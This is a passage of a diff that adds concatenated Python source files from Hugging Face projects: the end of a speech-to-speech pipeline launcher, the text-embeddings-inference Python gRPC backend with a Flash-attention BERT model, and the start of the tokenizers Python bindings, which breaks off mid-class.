+ else:
1173
+ raise ValueError('The STT should be either whisper, whisper-mlx, or paraformer.')
1174
+ if module_kwargs.llm == 'transformers':
1175
+ from LLM.language_model import LanguageModelHandler
1176
+ lm = LanguageModelHandler(stop_event, queue_in=text_prompt_queue, queue_out=lm_response_queue, setup_kwargs=vars(language_model_handler_kwargs))
1177
+ elif module_kwargs.llm == 'mlx-lm':
1178
+ from LLM.mlx_language_model import MLXLanguageModelHandler
1179
+ lm = MLXLanguageModelHandler(stop_event, queue_in=text_prompt_queue, queue_out=lm_response_queue, setup_kwargs=vars(mlx_language_model_handler_kwargs))
1180
+ else:
1181
+ raise ValueError('The LLM should be either transformers or mlx-lm')
1182
+ if module_kwargs.tts == 'parler':
1183
+ from TTS.parler_handler import ParlerTTSHandler
1184
+ tts = ParlerTTSHandler(stop_event, queue_in=lm_response_queue, queue_out=send_audio_chunks_queue, setup_args=(should_listen,), setup_kwargs=vars(parler_tts_handler_kwargs))
1185
+ elif module_kwargs.tts == 'melo':
1186
+ try:
1187
+ from TTS.melo_handler import MeloTTSHandler
1188
+ except RuntimeError as e:
1189
+ logger.error('Error importing MeloTTSHandler. You might need to run: python -m unidic download')
1190
+ raise e
1191
+ tts = MeloTTSHandler(stop_event, queue_in=lm_response_queue, queue_out=send_audio_chunks_queue, setup_args=(should_listen,), setup_kwargs=vars(melo_tts_handler_kwargs))
1192
+ elif module_kwargs.tts == 'chatTTS':
1193
+ try:
1194
+ from TTS.chatTTS_handler import ChatTTSHandler
1195
+ except RuntimeError as e:
1196
+ logger.error('Error importing ChatTTSHandler')
1197
+ raise e
1198
+ tts = ChatTTSHandler(stop_event, queue_in=lm_response_queue, queue_out=send_audio_chunks_queue, setup_args=(should_listen,), setup_kwargs=vars(chat_tts_handler_kwargs))
1199
+ else:
1200
+ raise ValueError('The TTS should be either parler, melo or chatTTS')
1201
+ try:
1202
+ pipeline_manager = ThreadManager([*comms_handlers, vad, stt, lm, tts])
1203
+ pipeline_manager.start()
1204
+ except KeyboardInterrupt:
1205
+ pipeline_manager.stop()
1206
+ if __name__ == '__main__':
1207
+ main()
1208
+
huggingface_text-embeddings-inference.txt ADDED
@@ -0,0 +1,385 @@
1
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/cli.py
2
+ import sys
3
+ import typer
4
+ from pathlib import Path
5
+ from loguru import logger
6
+ from typing import Optional
7
+ from enum import Enum
8
+ app = typer.Typer()
9
+
10
+ class Dtype(str, Enum):
11
+ float32 = 'float32'
12
+ float16 = 'float16'
13
+ bloat16 = 'bfloat16'
14
+
15
+ @app.command()
16
+ def serve(model_path: Path, dtype: Dtype='float32', uds_path: Path='/tmp/text-embeddings-server', logger_level: str='INFO', json_output: bool=False, otlp_endpoint: Optional[str]=None, otlp_service_name: str='text-embeddings-inference.server'):
17
+ logger.remove()
18
+ logger.add(sys.stdout, format='{message}', filter='text_embeddings_server', level=logger_level, serialize=json_output, backtrace=True, diagnose=False)
19
+ from text_embeddings_server import server
20
+ from text_embeddings_server.utils.tracing import setup_tracing
21
+ if otlp_endpoint is not None:
22
+ setup_tracing(otlp_endpoint=otlp_endpoint, otlp_service_name=otlp_service_name)
23
+ dtype = None if dtype is None else dtype.value
24
+ server.serve(model_path, dtype, uds_path)
25
+ if __name__ == '__main__':
26
+ app()
27
+
28
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/__init__.py
29
+ import torch
30
+ from loguru import logger
31
+ from pathlib import Path
32
+ from typing import Optional
33
+ from transformers import AutoConfig
34
+ from transformers.models.bert import BertConfig
35
+ from text_embeddings_server.models.model import Model
36
+ from text_embeddings_server.models.default_model import DefaultModel
37
+ __all__ = ['Model']
38
+ torch.set_grad_enabled(False)
39
+ FLASH_ATTENTION = True
40
+ try:
41
+ from text_embeddings_server.models.flash_bert import FlashBert
42
+ except ImportError as e:
43
+ logger.warning(f'Could not import Flash Attention enabled models: {e}')
44
+ FLASH_ATTENTION = False
45
+ if FLASH_ATTENTION:
46
+ __all__.append(FlashBert)
47
+
48
+ def get_model(model_path: Path, dtype: Optional[str]):
49
+ if dtype == 'float32':
50
+ dtype = torch.float32
51
+ elif dtype == 'float16':
52
+ dtype = torch.float16
53
+ elif dtype == 'bfloat16':
54
+ dtype = torch.bfloat16
55
+ else:
56
+ raise RuntimeError(f'Unknown dtype {dtype}')
57
+ if torch.cuda.is_available():
58
+ device = torch.device('cuda')
59
+ else:
60
+ if dtype != torch.float32:
61
+ raise ValueError('CPU device only supports float32 dtype')
62
+ device = torch.device('cpu')
63
+ config = AutoConfig.from_pretrained(model_path)
64
+ if config.model_type == 'bert':
65
+ config: BertConfig
66
+ if device.type == 'cuda' and config.position_embedding_type == 'absolute' and (dtype in [torch.float16, torch.bfloat16]) and FLASH_ATTENTION:
67
+ return FlashBert(model_path, device, dtype)
68
+ else:
69
+ return DefaultModel(model_path, device, dtype)
70
+ raise NotImplementedError
71
+
72
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/default_model.py
73
+ import inspect
74
+ import torch
75
+ from pathlib import Path
76
+ from typing import Type, List
77
+ from transformers import AutoModel
78
+ from opentelemetry import trace
79
+ from text_embeddings_server.models import Model
80
+ from text_embeddings_server.models.types import PaddedBatch, Embedding
81
+ tracer = trace.get_tracer(__name__)
82
+
83
+ class DefaultModel(Model):
84
+
85
+ def __init__(self, model_path: Path, device: torch.device, dtype: torch.dtype):
86
+ model = AutoModel.from_pretrained(model_path).to(dtype).to(device)
87
+ self.hidden_size = model.config.hidden_size
88
+ self.has_position_ids = inspect.signature(model.forward).parameters.get('position_ids', None) is not None
89
+ self.has_token_type_ids = inspect.signature(model.forward).parameters.get('token_type_ids', None) is not None
90
+ super(DefaultModel, self).__init__(model=model, dtype=dtype, device=device)
91
+
92
+ @property
93
+ def batch_type(self) -> Type[PaddedBatch]:
94
+ return PaddedBatch
95
+
96
+ @tracer.start_as_current_span('embed')
97
+ def embed(self, batch: PaddedBatch) -> List[Embedding]:
98
+ kwargs = {'input_ids': batch.input_ids, 'attention_mask': batch.attention_mask}
99
+ if self.has_token_type_ids:
100
+ kwargs['token_type_ids'] = batch.token_type_ids
101
+ if self.has_position_ids:
102
+ kwargs['position_ids'] = batch.position_ids
103
+ output = self.model(**kwargs)
104
+ embedding = output[0][:, 0]
105
+ cpu_results = embedding.view(-1).tolist()
106
+ return [Embedding(values=cpu_results[i * self.hidden_size:(i + 1) * self.hidden_size]) for i in range(len(batch))]
107
+
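DefaultModel.embed uses CLS pooling: output[0][:, 0] keeps the first token's hidden state for every sequence, and the flattened values are re-split by hidden_size into one Embedding per request. The slicing in isolation, on a dummy tensor:

import torch

# Dummy "last_hidden_state": batch of 2 sequences, 4 tokens, hidden size 3.
last_hidden_state = torch.arange(24, dtype=torch.float32).reshape(2, 4, 3)
cls_embeddings = last_hidden_state[:, 0]          # CLS pooling, as in DefaultModel.embed
flat = cls_embeddings.view(-1).tolist()
hidden_size = 3
per_request = [flat[i * hidden_size:(i + 1) * hidden_size] for i in range(2)]
print(per_request)   # [[0.0, 1.0, 2.0], [12.0, 13.0, 14.0]]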
108
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/flash_bert.py
109
+ import torch
110
+ from pathlib import Path
111
+ from torch import nn
112
+ from typing import Type, List
113
+ from safetensors import safe_open
114
+ from transformers.activations import ACT2FN
115
+ from transformers.models.bert import BertConfig
116
+ from opentelemetry import trace
117
+ import dropout_layer_norm
118
+ from text_embeddings_server.models import Model
119
+ from text_embeddings_server.models.types import FlashBatch, Embedding
120
+ from text_embeddings_server.utils.flash_attn import attention
121
+ tracer = trace.get_tracer(__name__)
122
+
123
+ class FastLayerNorm:
124
+
125
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
126
+ self.weight = handle.get_tensor(f'{prefix}.weight').to(dtype).to(device)
127
+ self.bias = handle.get_tensor(f'{prefix}.bias').to(dtype).to(device)
128
+ self.variance_epsilon = config.layer_norm_eps
129
+
130
+ def forward(self, hidden_states, residual=None):
131
+ (normed_hidden_states, res, *rest) = dropout_layer_norm.dropout_add_ln_fwd(hidden_states, residual, self.weight, self.bias, None, None, None, None, 0.0, self.variance_epsilon, 1.0, 0, None, False, False)
132
+ if res is None:
133
+ res = hidden_states
134
+ return (normed_hidden_states, res)
135
+
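FastLayerNorm wraps the fused dropout_add_ln_fwd kernel from flash-attention's dropout_layer_norm extension. As far as can be told from the call above (dropout probability 0.0), it computes LayerNorm(hidden + residual) and also returns the pre-norm sum; a plain-PyTorch approximation of that math, for reference only:

import torch

def layer_norm_add(hidden, residual, weight, bias, eps):
    # Reference math for FastLayerNorm.forward: add the residual (if any),
    # then apply LayerNorm with the given weight/bias (no dropout at p=0.0).
    res = hidden if residual is None else hidden + residual
    normed = torch.nn.functional.layer_norm(res, (res.shape[-1],), weight, bias, eps)
    return normed, res

h = torch.randn(4, 8)
w, b = torch.ones(8), torch.zeros(8)
out, res = layer_norm_add(h, None, w, b, 1e-12)
print(out.shape, res.shape)   # torch.Size([4, 8]) torch.Size([4, 8])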
136
+ class BertEmbeddings:
137
+
138
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
139
+ self.word_embeddings_weight = handle.get_tensor(f'{prefix}.word_embeddings.weight').to(dtype).to(device)
140
+ self.token_type_embeddings_weight = handle.get_tensor(f'{prefix}.token_type_embeddings.weight').to(dtype).to(device)
141
+ if config.position_embedding_type == 'absolute':
142
+ self.position_embeddings_weight = handle.get_tensor(f'{prefix}.position_embeddings.weight').to(dtype).to(device)
143
+ else:
144
+ raise NotImplementedError('FlashBert only supports absolute position embeddings')
145
+ self.layer_norm = FastLayerNorm(f'{prefix}.LayerNorm', handle, device, dtype, config)
146
+
147
+ def forward(self, input_ids, token_type_ids, position_ids):
148
+ inputs_embeds = nn.functional.embedding(input_ids, self.word_embeddings_weight)
149
+ token_type_embeds = nn.functional.embedding(token_type_ids, self.token_type_embeddings_weight)
150
+ position_embeds = nn.functional.embedding(position_ids, self.position_embeddings_weight)
151
+ inputs_embeds += position_embeds
152
+ (embeddings, _) = self.layer_norm.forward(inputs_embeds, token_type_embeds)
153
+ return embeddings
154
+
155
+ class BertAttention:
156
+
157
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
158
+ query_weight = handle.get_tensor(f'{prefix}.self.query.weight')
159
+ query_bias = handle.get_tensor(f'{prefix}.self.query.bias')
160
+ key_weight = handle.get_tensor(f'{prefix}.self.key.weight')
161
+ key_bias = handle.get_tensor(f'{prefix}.self.key.bias')
162
+ value_weight = handle.get_tensor(f'{prefix}.self.value.weight')
163
+ value_bias = handle.get_tensor(f'{prefix}.self.value.bias')
164
+ self.qkv_weight = torch.cat([query_weight, key_weight, value_weight]).T.to(dtype).to(device)
165
+ self.qkv_bias = torch.cat([query_bias, key_bias, value_bias]).to(dtype).to(device)
166
+ self.dense_weight = handle.get_tensor(f'{prefix}.output.dense.weight').T.to(dtype).to(device)
167
+ self.dense_bias = handle.get_tensor(f'{prefix}.output.dense.bias').to(dtype).to(device)
168
+ self.layer_norm = FastLayerNorm(f'{prefix}.output.LayerNorm', handle, device, dtype, config)
169
+ self.head_size = config.hidden_size // config.num_attention_heads
170
+ self.softmax_scale = self.head_size ** (-0.5)
171
+ self.num_heads = config.num_attention_heads
172
+
173
+ def forward(self, hidden_states, cu_seqlens, max_s):
174
+ residual = hidden_states
175
+ qkv = torch.addmm(self.qkv_bias, hidden_states, self.qkv_weight)
176
+ (q, k, v) = qkv.view(-1, self.num_heads * 3, self.head_size).split(self.num_heads, dim=1)
177
+ attn_output = torch.empty_like(q)
178
+ attention(q, k, v, attn_output, cu_seqlens, max_s, self.softmax_scale)
179
+ hidden_states = torch.addmm(self.dense_bias, attn_output.view(-1, self.num_heads * self.head_size), self.dense_weight)
180
+ (hidden_states, _) = self.layer_norm.forward(hidden_states, residual)
181
+ return hidden_states
182
+
183
+ class BertLayer:
184
+
185
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
186
+ self.attention = BertAttention(f'{prefix}.attention', handle, device, dtype, config)
187
+ self.intermediate_weight = handle.get_tensor(f'{prefix}.intermediate.dense.weight').T.to(dtype).to(device)
188
+ self.intermediate_bias = handle.get_tensor(f'{prefix}.intermediate.dense.bias').to(dtype).to(device)
189
+ act = config.hidden_act
190
+ self.intermediate_act_fn = ACT2FN[act] if 'gelu' not in act else lambda x: torch.nn.functional.gelu(x, approximate='tanh' if act in ['gelu_fast', 'gelu_pytorch_tanh'] else 'none')
191
+ self.output_weight = handle.get_tensor(f'{prefix}.output.dense.weight').T.to(dtype).to(device)
192
+ self.output_bias = handle.get_tensor(f'{prefix}.output.dense.bias').to(dtype).to(device)
193
+ self.layer_norm = FastLayerNorm(f'{prefix}.output.LayerNorm', handle, device, dtype, config)
194
+
195
+ def forward(self, hidden_states, cu_seqlens, max_s):
196
+ hidden_states = self.attention.forward(hidden_states, cu_seqlens, max_s)
197
+ residual = hidden_states
198
+ hidden_states = torch.addmm(self.intermediate_bias, hidden_states, self.intermediate_weight)
199
+ hidden_states = self.intermediate_act_fn(hidden_states)
200
+ hidden_states = torch.addmm(self.output_bias, hidden_states, self.output_weight)
201
+ (hidden_states, _) = self.layer_norm.forward(hidden_states, residual)
202
+ return hidden_states
203
+
204
+ class BertEncoder:
205
+
206
+ def __init__(self, prefix, handle, device, dtype, config: BertConfig):
207
+ self.layers = [BertLayer(f'{prefix}.layer.{i}', handle, device, dtype, config) for i in range(config.num_hidden_layers)]
208
+
209
+ def forward(self, hidden_states, cu_seqlens, max_s):
210
+ for layer in self.layers:
211
+ hidden_states = layer.forward(hidden_states, cu_seqlens, max_s)
212
+ return hidden_states
213
+
214
+ class FlashBertModel:
215
+
216
+ def __init__(self, handle, device, dtype, config: BertConfig):
217
+ self.embeddings = BertEmbeddings('embeddings', handle, device, dtype, config)
218
+ self.encoder = BertEncoder('encoder', handle, device, dtype, config)
219
+
220
+ def forward(self, input_ids, token_type_ids, position_ids, cu_seqlens, max_s):
221
+ embeddings = self.embeddings.forward(input_ids, token_type_ids, position_ids)
222
+ encoder_outputs = self.encoder.forward(embeddings, cu_seqlens, max_s)
223
+ return encoder_outputs[cu_seqlens[:-1]]
224
+
225
+ class FlashBert(Model):
226
+
227
+ def __init__(self, model_path: Path, device: torch.device, dtype: torch.dtype):
228
+ config = BertConfig.from_pretrained(model_path)
229
+ with safe_open(model_path / 'model.safetensors', framework='pt') as f:
230
+ model = FlashBertModel(f, device, dtype, config)
231
+ self.hidden_size = config.hidden_size
232
+ super(FlashBert, self).__init__(model=model, dtype=dtype, device=device)
233
+
234
+ @property
235
+ def batch_type(self) -> Type[FlashBatch]:
236
+ return FlashBatch
237
+
238
+ @tracer.start_as_current_span('embed')
239
+ def embed(self, batch: FlashBatch) -> List[Embedding]:
240
+ embedding = self.model.forward(input_ids=batch.input_ids, token_type_ids=batch.token_type_ids, position_ids=batch.position_ids, cu_seqlens=batch.cu_seqlens, max_s=batch.max_s)
241
+ cpu_results = embedding.view(-1).tolist()
242
+ return [Embedding(values=cpu_results[i * self.hidden_size:(i + 1) * self.hidden_size]) for i in range(len(batch))]
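A minimal standalone sketch (PyTorch only; the sizes and values are invented, not taken from the file above) of why FlashBertModel.forward returns encoder_outputs[cu_seqlens[:-1]]: in an unpadded batch all sequences are concatenated along the token dimension, and the cumulative sequence lengths mark where each sequence starts, so indexing with cu_seqlens[:-1] picks one first-token ([CLS]) hidden state per sequence.

import torch

# three sequences of lengths 2, 3 and 4 packed into a single [9, hidden] tensor
lengths = [2, 3, 4]
hidden_size = 8
packed_hidden = torch.randn(sum(lengths), hidden_size)

# cumulative sequence lengths, as carried by FlashBatch: [0, 2, 5, 9]
cu_seqlens = torch.tensor([0, 2, 5, 9], dtype=torch.long)

# cu_seqlens[:-1] == [0, 2, 5] is the row offset of each sequence's first token,
# so this selects exactly one hidden state per sequence (CLS pooling)
per_sequence = packed_hidden[cu_seqlens[:-1]]
print(per_sequence.shape)  # torch.Size([3, 8])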
243
+
244
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/model.py
245
+ import torch
246
+ from abc import ABC, abstractmethod
247
+ from typing import List, TypeVar, Type
248
+ from text_embeddings_server.models.types import Batch, Embedding
249
+ B = TypeVar('B', bound=Batch)
250
+
251
+ class Model(ABC):
252
+
253
+ def __init__(self, model, dtype: torch.dtype, device: torch.device):
254
+ self.model = model
255
+ self.dtype = dtype
256
+ self.device = device
257
+
258
+ @property
259
+ @abstractmethod
260
+ def batch_type(self) -> Type[B]:
261
+ raise NotImplementedError
262
+
263
+ @abstractmethod
264
+ def embed(self, batch: B) -> List[Embedding]:
265
+ raise NotImplementedError
266
+
267
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/models/types.py
268
+ import torch
269
+ from abc import ABC, abstractmethod
270
+ from dataclasses import dataclass
271
+ from opentelemetry import trace
272
+ from text_embeddings_server.pb import embed_pb2
273
+ from text_embeddings_server.pb.embed_pb2 import Embedding
274
+ tracer = trace.get_tracer(__name__)
275
+
276
+ class Batch(ABC):
277
+
278
+ @classmethod
279
+ @abstractmethod
280
+ def from_pb(cls, pb: embed_pb2.EmbedRequest, device: torch.device) -> 'Batch':
281
+ raise NotImplementedError
282
+
283
+ @abstractmethod
284
+ def __len__(self):
285
+ raise NotImplementedError
286
+
287
+ @dataclass
288
+ class PaddedBatch(Batch):
289
+ input_ids: torch.Tensor
290
+ token_type_ids: torch.Tensor
291
+ position_ids: torch.Tensor
292
+ attention_mask: torch.Tensor
293
+
294
+ @classmethod
295
+ @tracer.start_as_current_span('from_pb')
296
+ def from_pb(cls, pb: embed_pb2.EmbedRequest, device: torch.device) -> 'PaddedBatch':
297
+ all_tensors = torch.zeros([4, len(pb.cu_seq_lengths) - 1, pb.max_length], dtype=torch.int32)
298
+ for (i, start_index) in enumerate(pb.cu_seq_lengths[:-1]):
299
+ end_index = pb.cu_seq_lengths[i + 1]
300
+ input_length = end_index - start_index
301
+ all_tensors[0, i, :input_length] = torch.tensor(pb.input_ids[start_index:end_index], dtype=torch.int32)
302
+ all_tensors[1, i, :input_length] = torch.tensor(pb.token_type_ids[start_index:end_index], dtype=torch.int32)
303
+ all_tensors[2, i, :input_length] = torch.tensor(pb.position_ids[start_index:end_index], dtype=torch.int32)
304
+ all_tensors[3, i, :input_length] = 1
305
+ all_tensors = all_tensors.to(device)
306
+ return PaddedBatch(input_ids=all_tensors[0], token_type_ids=all_tensors[1], position_ids=all_tensors[2], attention_mask=all_tensors[3])
307
+
308
+ def __len__(self):
309
+ return len(self.input_ids)
310
+
311
+ @dataclass
312
+ class FlashBatch(Batch):
313
+ input_ids: torch.Tensor
314
+ token_type_ids: torch.Tensor
315
+ position_ids: torch.Tensor
316
+ cu_seqlens: torch.Tensor
317
+ max_s: int
318
+ size: int
319
+
320
+ @classmethod
321
+ @tracer.start_as_current_span('from_pb')
322
+ def from_pb(cls, pb: embed_pb2.EmbedRequest, device: torch.device) -> 'FlashBatch':
323
+ if device.type != 'cuda':
324
+ raise RuntimeError(f'FlashBatch does not support device {device}')
325
+ batch_input_ids = torch.tensor(pb.input_ids, dtype=torch.int32, device=device)
326
+ batch_token_type_ids = torch.tensor(pb.token_type_ids, dtype=torch.int32, device=device)
327
+ batch_position_ids = torch.tensor(pb.position_ids, dtype=torch.int32, device=device)
328
+ cu_seqlens = torch.tensor(pb.cu_seq_lengths, dtype=torch.int32, device=device)
329
+ return FlashBatch(input_ids=batch_input_ids, token_type_ids=batch_token_type_ids, position_ids=batch_position_ids, cu_seqlens=cu_seqlens, max_s=pb.max_length, size=len(cu_seqlens) - 1)
330
+
331
+ def __len__(self):
332
+ return self.size
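A rough standalone sketch of the two batch layouts defined above. The SimpleNamespace below only mimics the EmbedRequest fields that from_pb reads (input_ids, token_type_ids, position_ids, cu_seq_lengths, max_length); it is not the real protobuf message.

import torch
from types import SimpleNamespace

# two sequences of lengths 2 and 3, already flattened into single lists
pb = SimpleNamespace(
    input_ids=[101, 102, 101, 2023, 102],
    token_type_ids=[0, 0, 0, 0, 0],
    position_ids=[0, 1, 0, 1, 2],
    cu_seq_lengths=[0, 2, 5],
    max_length=3,
)

# PaddedBatch-style layout: one [batch, max_length] tensor per field plus a mask
padded = torch.zeros(len(pb.cu_seq_lengths) - 1, pb.max_length, dtype=torch.int32)
mask = torch.zeros_like(padded)
for i, start in enumerate(pb.cu_seq_lengths[:-1]):
    end = pb.cu_seq_lengths[i + 1]
    padded[i, : end - start] = torch.tensor(pb.input_ids[start:end], dtype=torch.int32)
    mask[i, : end - start] = 1

# FlashBatch-style layout: the flat tensors stay flat, only cu_seqlens is kept alongside
flat_ids = torch.tensor(pb.input_ids, dtype=torch.int32)
cu_seqlens = torch.tensor(pb.cu_seq_lengths, dtype=torch.int32)
print(padded.shape, flat_ids.shape)  # torch.Size([2, 3]) torch.Size([5])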
333
+
334
+ # File: text-embeddings-inference-main/backends/python/server/text_embeddings_server/server.py
335
+ import asyncio
336
+ import torch
337
+ from grpc import aio
338
+ from loguru import logger
339
+ from grpc_reflection.v1alpha import reflection
340
+ from pathlib import Path
341
+ from typing import Optional
342
+ from text_embeddings_server.models import Model, get_model
343
+ from text_embeddings_server.pb import embed_pb2_grpc, embed_pb2
344
+ from text_embeddings_server.utils.tracing import UDSOpenTelemetryAioServerInterceptor
345
+ from text_embeddings_server.utils.interceptor import ExceptionInterceptor
346
+
347
+ class EmbeddingService(embed_pb2_grpc.EmbeddingServiceServicer):
348
+
349
+ def __init__(self, model: Model):
350
+ self.model = model
351
+ self._inference_mode_raii_guard = torch._C._InferenceMode(True)
352
+
353
+ async def Health(self, request, context):
354
+ if self.model.device.type == 'cuda':
355
+ torch.zeros((2, 2), device='cuda')
356
+ return embed_pb2.HealthResponse()
357
+
358
+ async def Embed(self, request, context):
359
+ batch = self.model.batch_type.from_pb(request, self.model.device)
360
+ embeddings = self.model.embed(batch)
361
+ return embed_pb2.EmbedResponse(embeddings=embeddings)
362
+
363
+ def serve(model_path: Path, dtype: Optional[str], uds_path: Path):
364
+
365
+ async def serve_inner(model_path: Path, dtype: Optional[str]=None):
366
+ unix_socket = f'unix://{uds_path}'
367
+ try:
368
+ model = get_model(model_path, dtype)
369
+ except Exception:
370
+ logger.exception('Error when initializing model')
371
+ raise
372
+ server = aio.server(interceptors=[ExceptionInterceptor(), UDSOpenTelemetryAioServerInterceptor()])
373
+ embed_pb2_grpc.add_EmbeddingServiceServicer_to_server(EmbeddingService(model), server)
374
+ SERVICE_NAMES = (embed_pb2.DESCRIPTOR.services_by_name['EmbeddingService'].full_name, reflection.SERVICE_NAME)
375
+ reflection.enable_server_reflection(SERVICE_NAMES, server)
376
+ server.add_insecure_port(unix_socket)
377
+ await server.start()
378
+ logger.info(f'Server started at {unix_socket}')
379
+ try:
380
+ await server.wait_for_termination()
381
+ except KeyboardInterrupt:
382
+ logger.info('Signal received. Shutting down')
383
+ await server.stop(0)
384
+ asyncio.run(serve_inner(model_path, dtype))
385
+
huggingface_text-generation-inference.txt ADDED
The diff for this file is too large to render. See raw diff
 
huggingface_tokenizers.txt ADDED
@@ -0,0 +1,1157 @@
1
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/__init__.py
2
+ from enum import Enum
3
+ from typing import List, Tuple, Union
4
+ Offsets = Tuple[int, int]
5
+ TextInputSequence = str
6
+ ''
7
+ PreTokenizedInputSequence = Union[List[str], Tuple[str]]
8
+ ''
9
+ TextEncodeInput = Union[TextInputSequence, Tuple[TextInputSequence, TextInputSequence], List[TextInputSequence]]
10
+ ''
11
+ PreTokenizedEncodeInput = Union[PreTokenizedInputSequence, Tuple[PreTokenizedInputSequence, PreTokenizedInputSequence], List[PreTokenizedInputSequence]]
12
+ ''
13
+ InputSequence = Union[TextInputSequence, PreTokenizedInputSequence]
14
+ ''
15
+ EncodeInput = Union[TextEncodeInput, PreTokenizedEncodeInput]
16
+ ''
17
+
18
+ class OffsetReferential(Enum):
19
+ ORIGINAL = 'original'
20
+ NORMALIZED = 'normalized'
21
+
22
+ class OffsetType(Enum):
23
+ BYTE = 'byte'
24
+ CHAR = 'char'
25
+
26
+ class SplitDelimiterBehavior(Enum):
27
+ REMOVED = 'removed'
28
+ ISOLATED = 'isolated'
29
+ MERGED_WITH_PREVIOUS = 'merged_with_previous'
30
+ MERGED_WITH_NEXT = 'merged_with_next'
31
+ CONTIGUOUS = 'contiguous'
32
+ from .tokenizers import AddedToken, Encoding, NormalizedString, PreTokenizedString, Regex, Token, Tokenizer, decoders, models, normalizers, pre_tokenizers, processors, trainers, __version__
33
+ from .implementations import BertWordPieceTokenizer, ByteLevelBPETokenizer, CharBPETokenizer, SentencePieceBPETokenizer, SentencePieceUnigramTokenizer
34
+
35
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/decoders/__init__.py
36
+ from .. import decoders
37
+ Decoder = decoders.Decoder
38
+ ByteLevel = decoders.ByteLevel
39
+ Replace = decoders.Replace
40
+ WordPiece = decoders.WordPiece
41
+ ByteFallback = decoders.ByteFallback
42
+ Fuse = decoders.Fuse
43
+ Strip = decoders.Strip
44
+ Metaspace = decoders.Metaspace
45
+ BPEDecoder = decoders.BPEDecoder
46
+ CTC = decoders.CTC
47
+ Sequence = decoders.Sequence
48
+
49
+ # File: tokenizers-main/bindings/python/py_src/tokenizers/implementations/base_tokenizer.py
50
+ from typing import Dict, List, Optional, Tuple, Union
51
+ from tokenizers import AddedToken, EncodeInput, Encoding, InputSequence, Tokenizer
52
+ from tokenizers.decoders import Decoder
53
+ from tokenizers.models import Model
54
+ from tokenizers.normalizers import Normalizer
55
+ from tokenizers.pre_tokenizers import PreTokenizer
56
+ from tokenizers.processors import PostProcessor
57
+ Offsets = Tuple[int, int]
58
+
59
+ class BaseTokenizer:
60
+
61
+ def __init__(self, tokenizer: Tokenizer, parameters=None):
62
+ self._tokenizer = tokenizer
63
+ self._parameters = parameters if parameters is not None else {}
64
+
65
+ def __repr__(self):
66
+ return 'Tokenizer(vocabulary_size={}, {})'.format(self._tokenizer.get_vocab_size(), ', '.join((k + '=' + str(v) for (k, v) in self._parameters.items())))
67
+
68
+ def num_special_tokens_to_add(self, is_pair: bool) -> int:
69
+ return self._tokenizer.num_special_tokens_to_add(is_pair)
70
+
71
+ def get_vocab(self, with_added_tokens: bool=True) -> Dict[str, int]:
72
+ return self._tokenizer.get_vocab(with_added_tokens=with_added_tokens)
73
+
74
+ def get_added_tokens_decoder(self) -> Dict[int, AddedToken]:
75
+ return self._tokenizer.get_added_tokens_decoder()
76
+
77
+ def get_vocab_size(self, with_added_tokens: bool=True) -> int:
78
+ return self._tokenizer.get_vocab_size(with_added_tokens=with_added_tokens)
79
+
80
+ def enable_padding(self, direction: Optional[str]='right', pad_to_multiple_of: Optional[int]=None, pad_id: Optional[int]=0, pad_type_id: Optional[int]=0, pad_token: Optional[str]='[PAD]', length: Optional[int]=None):
81
+ return self._tokenizer.enable_padding(direction=direction, pad_to_multiple_of=pad_to_multiple_of, pad_id=pad_id, pad_type_id=pad_type_id, pad_token=pad_token, length=length)
82
+
83
+ def no_padding(self):
84
+ return self._tokenizer.no_padding()
85
+
86
+ @property
87
+ def padding(self) -> Optional[dict]:
88
+ return self._tokenizer.padding
89
+
90
+ def enable_truncation(self, max_length: int, stride: Optional[int]=0, strategy: Optional[str]='longest_first'):
91
+ return self._tokenizer.enable_truncation(max_length, stride=stride, strategy=strategy)
92
+
93
+ def no_truncation(self):
94
+ return self._tokenizer.no_truncation()
95
+
96
+ @property
97
+ def truncation(self) -> Optional[dict]:
98
+ return self._tokenizer.truncation
99
+
100
+ def add_tokens(self, tokens: List[Union[str, AddedToken]]) -> int:
101
+ return self._tokenizer.add_tokens(tokens)
102
+
103
+ def add_special_tokens(self, special_tokens: List[Union[str, AddedToken]]) -> int:
104
+ return self._tokenizer.add_special_tokens(special_tokens)
105
+
106
+ def normalize(self, sequence: str) -> str:
107
+ return self._tokenizer.normalize(sequence)
108
+
109
+ def encode(self, sequence: InputSequence, pair: Optional[InputSequence]=None, is_pretokenized: bool=False, add_special_tokens: bool=True) -> Encoding:
110
+ if sequence is None:
111
+ raise ValueError("encode: `sequence` can't be `None`")
112
+ return self._tokenizer.encode(sequence, pair, is_pretokenized, add_special_tokens)
113
+
114
+ def encode_batch(self, inputs: List[EncodeInput], is_pretokenized: bool=False, add_special_tokens: bool=True) -> List[Encoding]:
115
+ if inputs is None:
116
+ raise ValueError("encode_batch: `inputs` can't be `None`")
117
+ return self._tokenizer.encode_batch(inputs, is_pretokenized, add_special_tokens)
118
+
119
+ def decode(self, ids: List[int], skip_special_tokens: Optional[bool]=True) -> str:
120
+ if ids is None:
121
+ raise ValueError('None input is not valid. Should be a list of integers.')
122
+ return self._tokenizer.decode(ids, skip_special_tokens=skip_special_tokens)
123
+
124
+ def decode_batch(self, sequences: List[List[int]], skip_special_tokens: Optional[bool]=True) -> str:
125
+ if sequences is None:
126
+ raise ValueError('None input is not valid. Should be list of list of integers.')
127
+ return self._tokenizer.decode_batch(sequences, skip_special_tokens=skip_special_tokens)
128
+
129
+ def token_to_id(self, token: str) -> Optional[int]:
130
+ return self._tokenizer.token_to_id(token)
131
+
132
+ def id_to_token(self, id: int) -> Optional[str]:
133
+ return self._tokenizer.id_to_token(id)
134
+
135
+ def save_model(self, directory: str, prefix: Optional[str]=None):
136
+ return self._tokenizer.model.save(directory, prefix=prefix)
137
+
138
+ def save(self, path: str, pretty: bool=True):
139
+ return self._tokenizer.save(path, pretty)
140
+
141
+ def to_str(self, pretty: bool=False):
142
+ return self._tokenizer.to_str(pretty)
143
+
144
